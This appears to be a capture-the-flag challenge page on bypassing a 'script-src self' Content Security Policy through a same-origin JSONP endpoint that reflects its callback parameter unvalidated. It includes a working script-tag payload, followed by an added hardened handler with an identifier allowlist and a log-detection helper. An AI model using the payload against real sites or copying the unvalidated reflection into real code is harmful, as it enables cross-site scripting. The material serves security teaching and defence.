Level 2: CSP Bypass via Trusted JSONP
MISSION: A strict CSP blocks inline scripts. Find a way to execute JS using the whitelisted API endpoint.
CSP: script-src 'self';
/// SOURCE CODE INSPECTOR ///
// 1. Strict CSP is set on the page
res.setHeader("Content-Security-Policy", "default-src 'none'; script-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; font-src https://fonts.gstatic.com;");
// 2. But the page trusts endpoints on 'self', including this JSONP route
app.get('/level2/api/jsonp', (req, res) => {
  const callback = req.query.callback || 'console.log';
  res.type('application/javascript');
  // The callback parameter is reflected directly into the JS response!
  res.send(callback + '({"status": "ok"});');
});
/// DECRYPTION COMPLETE ///
The CSP blocks inline scripts but allows scripts loaded from 'self' (the same origin as the page). Because that same origin hosts an open JSONP endpoint that reflects the callback parameter into a JavaScript response without validation, we can point a script tag at it and the reflected value executes as code.
Payload:
<script src="/level2/api/jsonp?callback=alert(1)//"></script>
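As an added example (not code from the challenge), here is the inspector's JSONP handler rewritten as a plain function beside a hardened version that only accepts an identifier-shaped callback name, plus a small check a defender can run over logged callback values. Both handlers take a parsed query object, as Express exposes in req.query, and return the response pieces instead of writing to a socket, so the example runs without a server.

```javascript
// Added example, not part of the challenge page. The handlers take the
// parsed query object (Express's req.query) and return the response
// pieces so they can be exercised without an HTTP server.

// Vulnerable: the callback name is concatenated into executable JS as-is,
// which is exactly what the level's payload abuses.
function jsonpVulnerable(query) {
  const callback = query.callback || 'console.log';
  return {
    contentType: 'application/javascript',
    body: callback + '({"status": "ok"});',
  };
}

// A JSONP callback only ever needs to be a JavaScript identifier, possibly
// dotted (e.g. "cb" or "app.handlers.onData"). Anything else is rejected.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

// Hardened: validate the requested name against the allowlist pattern,
// fall back to a fixed default otherwise, and send X-Content-Type-Options
// so the browser does not reinterpret the response as another type.
function jsonpHardened(query) {
  const requested = typeof query.callback === 'string' ? query.callback : '';
  const callback = CALLBACK_RE.test(requested) ? requested : 'console.log';
  return {
    contentType: 'application/javascript',
    headers: { 'X-Content-Type-Options': 'nosniff' },
    body: callback + '({"status": "ok"});',
  };
}

// Detection aid for access logs: true when a callback value is not a plain
// identifier, i.e. has the shape of the payload shown above.
function isSuspiciousCallback(value) {
  return typeof value === 'string' && !CALLBACK_RE.test(value);
}

// Constructed sample request matching the level's payload.
const sampleQuery = { callback: 'alert(1)//' };
console.log('vulnerable:', jsonpVulnerable(sampleQuery).body);
console.log('hardened:  ', jsonpHardened(sampleQuery).body);
```

Note that the allowlist alone already removes the bypass; the nosniff header is defence in depth for the case where the endpoint is reached with an unexpected Content-Type.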